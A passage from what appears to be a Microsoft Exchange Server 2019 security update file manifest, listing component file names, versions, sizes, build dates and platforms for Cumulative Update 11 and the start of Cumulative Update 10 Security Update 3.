\nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.986.14| 40,312| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.986.14| 22,920| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.986.14| 21,384| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.986.14| 213,392| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.986.14| 99,208| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.986.14| 22,904| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.986.14| 169,352| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.986.11| 18,296| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.986.14| 20,880| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.986.14| 31,608| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.986.14| 46,968| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.986.14| 30,080| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.986.14| 53,136| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.986.14| 47,480| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.986.14| 18,296| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.986.14| 46,472| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.986.14| 46,472| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.986.13| 28,024| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.986.14| 457,096| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.986.14| 18,296| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.986.14| 30,608| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.transport.dll| 15.2.986.14| 4,183,440| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.986.14| 182,160| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.986.11| 121,736| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.986.14| 406,928| 3-Nov-21| 19:26| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.986.11| 14,720| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.986.14| 90,000| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.986.14| 88,976| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.986.14| 68,472| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.986.14| 63,352| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.986.14| 428,920| 3-Nov-21| 21:24| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.986.14| 121,232| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.986.14| 17,784| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.986.14| 29,064| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.986.14| 60,296| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.986.13| 49,552| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.986.14| 33,160| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.986.14| 112,528| 3-Nov-21| 19:40| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.986.13| 18,312| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.986.14| 52,104| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.986.14| 672,136| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.986.14| 23,952| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.986.14| 17,784| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.986.14| 487,304| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.986.14| 306,064| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.986.11| 15,744| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.986.14| 46,456| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.986.14| 1,044,360| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.986.11| 15,248| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.986.11| 18,824| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.986.14| 18,808| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.986.13| 118,672| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.986.14| 925,048| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.986.14| 1,469,840| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.986.14| 32,632| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.986.14| 41,848| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.986.14| 24,976| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.986.11| 15,248| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.986.14| 83,320| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.986.14| 50,040| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.986.14| 658,808| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.986.11| 186,248| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.986.14| 67,448| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.986.14| 56,704| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.986.14| 28,048| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.986.14| 120,696| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.986.14| 31,608| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.986.14| 57,208| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.986.11| 35,720| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.webservices.dll| 15.2.986.11| 1,054,088| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.986.11| 67,976| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.986.14| 23,432| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.986.13| 76,168| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.986.11| 17,280| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.986.11| 29,064| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.986.14| 505,224| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.986.11| 14,728| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.986.14| 36,728| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.986.14| 66,440| 3-Nov-21| 19:37| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.986.11| 19,320| 3-Nov-21| 18:11| x86 \nMicrosoft.filtering.dll| 15.2.986.14| 113,016| 3-Nov-21| 18:23| x86 \nMicrosoft.filtering.exchange.dll| 15.2.986.14| 57,232| 3-Nov-21| 19:51| x86 \nMicrosoft.filtering.interop.dll| 15.2.986.11| 15,232| 3-Nov-21| 18:13| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.986.14| 46,992| 3-Nov-21| 18:59| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.986.11| 15,736| 3-Nov-21| 18:14| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.986.11| 23,928| 3-Nov-21| 18:14| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.986.11| 22,416| 3-Nov-21| 18:11| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.986.11| 34,176| 3-Nov-21| 18:13| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,941| 3-Nov-21| 20:40| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,317| 3-Nov-21| 20:40| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.986.14| 1,517,960| 3-Nov-21| 21:27| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:18| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.986.14| 33,168| 3-Nov-21| 21:00| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.986.11| 18,312| 3-Nov-21| 18:13| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.986.14| 45,952| 3-Nov-21| 19:53| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.986.14| 50,568| 3-Nov-21| 19:53| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.986.13| 72,568| 3-Nov-21| 18:13| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.986.13| 541,584| 3-Nov-21| 18:11| x86 \nMicrosoft.managementgui.dll| 15.2.986.11| 133,520| 3-Nov-21| 18:11| x86 \nMicrosoft.mce.interop.dll| 15.2.986.11| 24,440| 3-Nov-21| 18:11| x86 \nMicrosoft.office.audit.dll| 15.2.986.11| 124,800| 3-Nov-21| 18:11| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.986.14| 585,616| 3-Nov-21| 18:28| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.986.14| 42,360| 3-Nov-21| 18:20| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.986.14| 218,000| 3-Nov-21| 22:15| x86 \nMicrosoft.office.compliance.console.dll| 15.2.986.14| 854,904| 3-Nov-21| 22:24| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.986.14| 485,776| 3-Nov-21| 22:22| x86 \nMicrosoft.office.compliance.core.dll| 15.2.986.14| 412,048| 3-Nov-21| 18:23| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.986.14| 36,216| 3-Nov-21| 18:18| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.986.14| 85,368| 3-Nov-21| 19:50| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.986.13| 1,782,672| 3-Nov-21| 18:11| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.986.14| 49,544| 3-Nov-21| 19:50| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.986.14| 27,536| 3-Nov-21| 19:53| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.986.14| 174,984| 3-Nov-21| 18:24| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.986.14| 166,288| 3-Nov-21| 19:21| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.986.11| 40,336| 3-Nov-21| 18:11| x86 \nMicrosoft.online.box.shell.dll| 15.2.986.11| 46,456| 3-Nov-21| 18:13| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.986.11| 67,960| 3-Nov-21| 18:11| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.986.11| 67,960| 3-Nov-21| 18:11| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.986.14| 120,184| 3-Nov-21| 18:20| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,102| 3-Nov-21| 18:11| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,044| 3-Nov-21| 18:13| Not applicable \nMovemailbox.ps1| Not applicable| 61,140| 3-Nov-21| 18:11| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 3-Nov-21| 18:11| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,528| 3-Nov-21| 18:11| Not applicable \nMpgearparser.dll| 15.2.986.11| 99,712| 3-Nov-21| 18:14| x64 \nMsclassificationadapter.dll| 15.2.986.11| 248,704| 3-Nov-21| 18:19| x64 \nMsexchangecompliance.exe| 15.2.986.14| 78,712| 3-Nov-21| 20:14| x86 \nMsexchangedagmgmt.exe| 15.2.986.14| 25,488| 3-Nov-21| 20:01| x86 \nMsexchangedelivery.exe| 15.2.986.14| 38,776| 3-Nov-21| 20:03| x86 \nMsexchangefrontendtransport.exe| 15.2.986.14| 31,608| 3-Nov-21| 19:51| x86 \nMsexchangehmhost.exe| 15.2.986.14| 27,000| 3-Nov-21| 21:24| x86 \nMsexchangehmrecovery.exe| 15.2.986.14| 29,584| 3-Nov-21| 19:16| x86 \nMsexchangemailboxassistants.exe| 15.2.986.14| 72,584| 3-Nov-21| 20:01| x86 \nMsexchangemailboxreplication.exe| 15.2.986.14| 20,880| 3-Nov-21| 20:08| x86 \nMsexchangemigrationworkflow.exe| 15.2.986.14| 69,496| 3-Nov-21| 20:13| x86 \nMsexchangerepl.exe| 15.2.986.14| 72,072| 3-Nov-21| 20:01| x86 \nMsexchangesubmission.exe| 15.2.986.14| 123,256| 3-Nov-21| 20:08| x86 \nMsexchangethrottling.exe| 15.2.986.14| 39,816| 3-Nov-21| 19:00| x86 \nMsexchangetransport.exe| 15.2.986.14| 74,112| 3-Nov-21| 18:59| x86 \nMsexchangetransportlogsearch.exe| 15.2.986.14| 139,128| 3-Nov-21| 19:53| x86 \nMsexchangewatchdog.exe| 15.2.986.11| 55,672| 3-Nov-21| 18:13| x64 \nMspatchlinterop.dll| 15.2.986.11| 53,632| 3-Nov-21| 18:18| x64 \nNativehttpproxy.dll| 15.2.986.11| 91,520| 3-Nov-21| 18:19| x64 \nNavigatorparser.dll| 15.2.986.11| 636,816| 3-Nov-21| 18:13| x64 \nNego2nativeinterface.dll| 15.2.986.11| 19,328| 3-Nov-21| 18:18| x64 \nNegotiateclientcertificatemodule.dll| 15.2.986.11| 30,096| 3-Nov-21| 18:13| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,760| 3-Nov-21| 18:13| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,579| 3-Nov-21| 18:13| Not applicable \nNtspxgen.dll| 15.2.986.11| 80,760| 3-Nov-21| 18:18| x64 \nOleconverter.exe| 15.2.986.11| 173,968| 3-Nov-21| 18:13| x64 \nOutsideinmodule.dll| 15.2.986.11| 87,936| 3-Nov-21| 18:13| x64 \nOwaauth.dll| 15.2.986.11| 92,024| 3-Nov-21| 18:18| x64 \nPerf_common_extrace.dll| 15.2.986.11| 245,112| 3-Nov-21| 18:11| x64 \nPerf_exchmem.dll| 15.2.986.11| 86,392| 3-Nov-21| 18:13| x64 \nPipeline2.dll| 15.2.986.11| 1,454,480| 3-Nov-21| 18:14| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,979| 3-Nov-21| 18:13| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,225| 3-Nov-21| 18:13| Not applicable \nProductinfo.managed.dll| 15.2.986.11| 27,000| 3-Nov-21| 18:11| x86 \nProxybinclientsstringsdll| 15.2.986.11| 924,536| 3-Nov-21| 18:11| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,238| 3-Nov-21| 18:13| Not applicable \nQuietexe.exe| 15.2.986.11| 14,712| 3-Nov-21| 18:13| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,604| 3-Nov-21| 18:11| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,675| 3-Nov-21| 20:36| Not applicable \nRemoteexchange.ps1| Not applicable| 23,593| 3-Nov-21| 20:40| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,676| 3-Nov-21| 18:11| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 3-Nov-21| 18:13| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,008| 3-Nov-21| 18:13| Not applicable \nReplaycrimsonmsg.dll| 15.2.986.11| 1,104,784| 3-Nov-21| 18:11| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,496| 3-Nov-21| 20:36| Not applicable \nResetcasservice.ps1| Not applicable| 21,707| 3-Nov-21| 18:11| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,101| 3-Nov-21| 18:13| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,137| 3-Nov-21| 18:14| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,210| 3-Nov-21| 18:11| Not applicable \nRightsmanagementwrapper.dll| 15.2.986.13| 86,416| 3-Nov-21| 18:18| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,790| 3-Nov-21| 18:13| Not applicable \nRpcperf.dll| 15.2.986.11| 23,408| 3-Nov-21| 18:14| x64 \nRpcproxyshim.dll| 15.2.986.13| 39,304| 3-Nov-21| 18:18| x64 \nRulesauditmsg.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:14| x64 \nSafehtmlnativewrapper.dll| 15.2.986.11| 34,688| 3-Nov-21| 18:18| x64 \nScanenginetest.exe| 15.2.986.11| 956,288| 3-Nov-21| 18:13| x64 \nScanningprocess.exe| 15.2.986.11| 739,192| 3-Nov-21| 18:14| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,812| 3-Nov-21| 18:13| Not applicable \nServicecontrol.ps1| Not applicable| 52,329| 3-Nov-21| 18:13| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 3-Nov-21| 18:11| Not applicable \nSettingsadapter.dll| 15.2.986.11| 116,112| 3-Nov-21| 18:13| x64 \nSetup.exe| 15.2.986.14| 20,880| 3-Nov-21| 18:18| x86 \nSetupui.exe| 15.2.986.14| 188,296| 3-Nov-21| 20:31| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,169| 3-Nov-21| 18:11| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,867| 3-Nov-21| 18:11| Not applicable \nStatisticsutil.dll| 15.2.986.11| 142,208| 3-Nov-21| 18:14| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,129| 3-Nov-21| 18:11| Not applicable \nStoretsconstants.ps1| Not applicable| 15,814| 3-Nov-21| 18:13| Not applicable \nStoretslibrary.ps1| Not applicable| 27,987| 3-Nov-21| 18:13| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.986.11| 28,536| 3-Nov-21| 18:13| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,927| 3-Nov-21| 18:11| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,969| 3-Nov-21| 18:11| Not applicable \nTest_mitigationserviceconnectivity.ps1| Not applicable| 14,170| 3-Nov-21| 18:11| Not applicable \nTextconversionmodule.dll| 15.2.986.11| 86,416| 3-Nov-21| 18:13| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,723| 3-Nov-21| 18:13| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,433| 3-Nov-21| 18:13| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,029| 3-Nov-21| 18:13| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,473| 3-Nov-21| 18:13| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,030| 3-Nov-21| 18:11| Not applicable \nUpdatecas.ps1| Not applicable| 38,189| 3-Nov-21| 18:14| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,742| 3-Nov-21| 18:14| Not applicable \nUpdateserver.exe| 15.2.986.11| 3,014,520| 3-Nov-21| 18:14| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 3-Nov-21| 18:11| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,046| 3-Nov-21| 22:14| Not applicable \nWsbexchange.exe| 15.2.986.11| 125,312| 3-Nov-21| 18:19| x64 \nX400prox.dll| 15.2.986.11| 103,296| 3-Nov-21| 18:13| x64 \n_search.lingoperators.a| 15.2.986.14| 34,696| 3-Nov-21| 19:37| Not applicable \n_search.lingoperators.b| 15.2.986.14| 34,696| 3-Nov-21| 19:37| Not applicable \n_search.mailboxoperators.a| 15.2.986.14| 290,192| 3-Nov-21| 20:04| Not applicable \n_search.mailboxoperators.b| 15.2.986.14| 290,192| 3-Nov-21| 20:04| Not applicable \n_search.operatorschema.a| 15.2.986.14| 485,776| 3-Nov-21| 19:23| Not applicable \n_search.operatorschema.b| 15.2.986.14| 485,776| 3-Nov-21| 19:23| Not applicable \n_search.tokenoperators.a| 15.2.986.14| 113,032| 3-Nov-21| 19:37| Not applicable \n_search.tokenoperators.b| 15.2.986.14| 113,032| 3-Nov-21| 19:37| Not applicable \n_search.transportoperators.a| 15.2.986.14| 67,984| 3-Nov-21| 20:08| Not applicable \n_search.transportoperators.b| 15.2.986.14| 67,984| 3-Nov-21| 20:08| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 10 Security Update 3\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.922.19| 71,048| 3-Nov-21| 19:26| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,538| 3-Nov-21| 19:22| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,941| 3-Nov-21| 19:38| Not applicable \nAdemodule.dll| 15.2.922.19| 106,360| 3-Nov-21| 19:25| x64 \nAirfilter.dll| 15.2.922.19| 42,872| 3-Nov-21| 19:25| x64 \nAjaxcontroltoolkit.dll| 15.2.922.19| 92,552| 3-Nov-21| 19:38| x86 \nAntispamcommon.ps1| Not applicable| 13,501| 3-Nov-21| 19:24| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 3-Nov-21| 21:04| Not applicable \nAsentirs.msi| Not applicable| 77,824| 3-Nov-21| 21:04| Not applicable \nAsentsig.msi| Not applicable| 73,728| 3-Nov-21| 19:25| Not applicable \nBigfunnel.bondtypes.dll| 15.2.922.19| 45,432| 3-Nov-21| 19:31| x86 \nBigfunnel.common.dll| 15.2.922.19| 66,448| 3-Nov-21| 19:22| x86 \nBigfunnel.configuration.dll| 15.2.922.19| 118,160| 3-Nov-21| 21:04| x86 \nBigfunnel.entropy.dll| 15.2.922.19| 44,424| 3-Nov-21| 19:30| x86 \nBigfunnel.filter.dll| 15.2.922.19| 54,160| 3-Nov-21| 19:38| x86 \nBigfunnel.indexstream.dll| 15.2.922.19| 68,984| 3-Nov-21| 19:38| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,136| 3-Nov-21| 19:25| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.922.19| 19,840| 3-Nov-21| 21:04| x86 \nBigfunnel.poi.dll| 15.2.922.19| 245,136| 3-Nov-21| 19:26| x86 \nBigfunnel.postinglist.dll| 15.2.922.19| 189,320| 3-Nov-21| 19:38| x86 \nBigfunnel.query.dll| 15.2.922.19| 101,256| 3-Nov-21| 19:24| x86 \nBigfunnel.ranking.dll| 15.2.922.19| 109,448| 3-Nov-21| 19:38| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.922.19| 3,634,568| 3-Nov-21| 19:38| x86 \nBigfunnel.tracing.dll| 15.2.922.19| 42,872| 3-Nov-21| 19:24| x86 \nBigfunnel.wordbreakers.dll| 15.2.922.19| 46,480| 3-Nov-21| 19:38| x86 \nCafe_airfilter_dll| 15.2.922.19| 42,872| 3-Nov-21| 19:25| x64 \nCafe_exppw_dll| 15.2.922.19| 83,336| 3-Nov-21| 19:24| x64 \nCafe_owaauth_dll| 15.2.922.19| 92,040| 3-Nov-21| 19:39| x64 \nCalcalculation.ps1| Not applicable| 42,089| 3-Nov-21| 19:38| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,618| 3-Nov-21| 19:38| Not applicable \nChksgfiles.dll| 15.2.922.19| 57,208| 3-Nov-21| 19:38| x64 \nCitsconstants.ps1| Not applicable| 15,837| 3-Nov-21| 21:04| Not applicable \nCitslibrary.ps1| Not applicable| 82,676| 3-Nov-21| 21:04| Not applicable \nCitstypes.ps1| Not applicable| 14,476| 3-Nov-21| 21:04| Not applicable \nClassificationengine_mce| 15.2.922.19| 1,693,064| 3-Nov-21| 19:39| Not applicable \nClusmsg.dll| 15.2.922.19| 134,032| 3-Nov-21| 19:25| x64 \nCoconet.dll| 15.2.922.19| 48,016| 3-Nov-21| 19:24| x64 \nCollectovermetrics.ps1| Not applicable| 81,656| 3-Nov-21| 19:38| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,866| 3-Nov-21| 19:38| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,923| 3-Nov-21| 21:55| Not applicable \nComplianceauditservice.exe| 15.2.922.19| 39,824| 3-Nov-21| 21:58| x86 \nConfigureadam.ps1| Not applicable| 22,796| 3-Nov-21| 19:38| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 3-Nov-21| 19:38| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,071| 3-Nov-21| 19:38| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,802| 3-Nov-21| 19:38| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,860| 3-Nov-21| 19:38| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,275| 3-Nov-21| 19:38| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 3-Nov-21| 21:55| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 3-Nov-21| 21:55| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,228| 3-Nov-21| 21:39| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,065| 3-Nov-21| 19:38| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,544| 3-Nov-21| 19:38| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,777| 3-Nov-21| 19:38| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,924| 3-Nov-21| 19:38| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 